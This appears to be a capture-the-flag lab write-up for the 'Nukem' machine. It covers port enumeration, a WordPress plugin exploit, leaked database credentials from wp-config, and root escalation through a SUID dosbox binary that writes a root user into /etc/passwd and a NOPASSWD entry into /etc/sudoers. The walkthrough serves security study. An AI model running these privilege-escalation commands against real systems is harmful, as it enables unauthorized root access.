Malleum Knowledge Base

Nukem

2 min read

Enumeration

22 tcp ssh OpenSSH 8.3 (protocol 2.0) 80 tcp http Apache httpd 2.4.46 ((Unix) PHP/7.4.10) 3306 tcp mysql 5000 tcp http Werkzeug httpd 1.0.1 (Python 3.8.5) 13000 tcp http nginx 1.18.0 36445 tcp netbios-ssn Samba smbd 4.6.2

In total 6 ports are open.

Port 22

Port 22 is using openssh 8.3 which I havent seen any vuln till now.

Port 80

searchsploit -m 48979 ( word press simple-flie-list)

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'commander' );

/** MySQL database password */
define( 'DB_PASSWORD', 'CommanderKeenVorticons1990' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+


Using https://linux.die.net/man/1/dosbox

# dosbox opens an emulator command prompt on UI.

# as VNC is running on localhost 5901

# time to port forward so we can connnect to vnc via localhost

$ ssh -L 5901:localhost:5901 commander@192.168.125.105

# running /usr/bin/dosbox

# opens a dosbox cmd prompt

# looks like windows

Using https://linux.die.net/man/1/dosbox

# searching for suid /usr/bin/dosbox > https://github.com/liwuqi/huck-box/blob/master/my_notes

# we can mount file system using MOUNT <drive> <path>

Z:\> MOUNT k /

Mounting / is NOT recommended. Please mount a (sub)directory next time.

Drive k is mounted as local directory /.

Z:\> k:

# we are now under / filesystem

# can read /root/proof.txt flag but we need interactive shell

# changing /etc/passwd

K:\> echo 'kashz:cAZZtf3ncxRAY:0:0:root:/root:/bin/bash' >> /etc/passwd

[commander@nukem ~]$ su kashz

Password:

Warning: your password will expire in 32558 days.

: No such file or directorybash

# not working

# lets add commander to sudoers

K:\> echo commander ALL=(ALL) NOPASSWD:ALL >> /etc/sudoers

# via ssh shell

[commander@nukem ~]$ sudo su

[root@nukem commander]# whoami;id;hostname

root

uid=0(root) gid=0(root) groups=0(root)

nukem

Graph View